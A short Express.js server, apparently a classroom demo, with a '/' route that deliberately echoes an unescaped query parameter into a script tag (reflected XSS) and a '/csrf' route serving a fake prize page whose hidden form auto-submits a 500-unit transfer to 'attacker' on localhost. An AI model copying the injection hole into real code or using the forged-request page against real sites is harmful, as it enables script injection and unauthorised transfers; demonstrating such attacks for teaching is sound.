const express = require("express");
const app = express();
const path = require('path');
app.get('/', (req, res) => {
    const name = req.query.name || "guest"
    // 直接输出未转义的用户输入
    res.send(`<script>alert("Hello, ${name}")</script>`)
})
app.get('/b.html', (req, res) => {
  res.sendFile(path.join(__dirname, './index.html'))
})


app.get('/csrf', (req, res) => {
    // 自动提交表单，悄悄发请求到 victim
    res.send(`
      <h1>免费抽奖！</h1>
      <form action="http://localhost:3000/transfer" method="POST">
        <input type="hidden" name="to" value="attacker" />
        <input type="hidden" name="amount" value="500" />
        <input type="submit" value="点我领取奖励！" />
      </form>
      <script>
        document.forms[0].submit();
      </script>
    `);
})

app.listen(4000, () => {
  console.log("http://localhost:4000");
})